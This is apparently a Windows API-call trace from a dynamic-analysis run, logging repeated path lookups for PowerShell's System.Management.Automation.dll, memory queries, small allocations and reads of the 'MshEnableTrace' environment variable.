	[0307.802] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.803] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.804] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.805] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.806] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.807] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.808] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.809] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.810] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bf60, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.811] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28beb0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.819] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0307.820] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.563] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28bef0, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.564] GetFullPathNameW (in: lpFileName="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", nBufferLength=0x105, lpBuffer=0x28be40, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\assembly\\GAC_MSIL\\System.Management.Automation\\1.0.0.0__31bf3856ad364e35\\System.Management.Automation.dll", lpFilePart=0x0) returned 0x74
	[0308.565] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0308.570] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0308.570] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0308.570] CoTaskMemFree (pv=0x471920) 
	[0309.151] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.159] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.159] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.159] CoTaskMemFree (pv=0x471920) 
	[0309.160] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.160] CoTaskMemFree (pv=0x471920) 
	[0309.160] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.160] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.160] CoTaskMemFree (pv=0x471920) 
	[0309.163] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.163] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.163] CoTaskMemFree (pv=0x471920) 
	[0309.167] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.167] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.167] CoTaskMemFree (pv=0x471920) 
	[0309.168] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.168] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.168] CoTaskMemFree (pv=0x471920) 
	[0309.173] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.173] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.767] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0309.769] CoTaskMemAlloc (cb=0x104) returned 0x471920
	[0309.769] GetEnvironmentVariableW (in: lpName="MshEnableTrace", lpBuffer=0x471920, nSize=0x80 | out: lpBuffer="") returned 0x0
	[0309.770] CoTaskMemFree (pv=0x471920) 
	[0310.954] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x471d60
	[0310.955] LocalAlloc (uFlags=0x0, uBytes=0x100) returned 0x471e70
	[0312.102] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.657] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.659] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0312.659] VirtualQuery (in: lpAddress=0x289fc0, lpBuffer=0x28ae80, dwLength=0x30 | out: lpBuffer=0x28ae80*(BaseAddress=0x289000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x7000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.350] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.350] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
	[0313.350] VirtualQuery (in: lpAddress=0x28b570, lpBuffer=0x28c430, dwLength=0x30 | out: lpBuffer=0x28c430*(BaseAddress=0x28b000, AllocationBase=0x210000, AllocationProtect=0x4, __alignment1=0x0, RegionSize=0x5000, State=0x1000, Protect=0x4, Type=0x20000, __alignment2=0x0)) returned 0x30
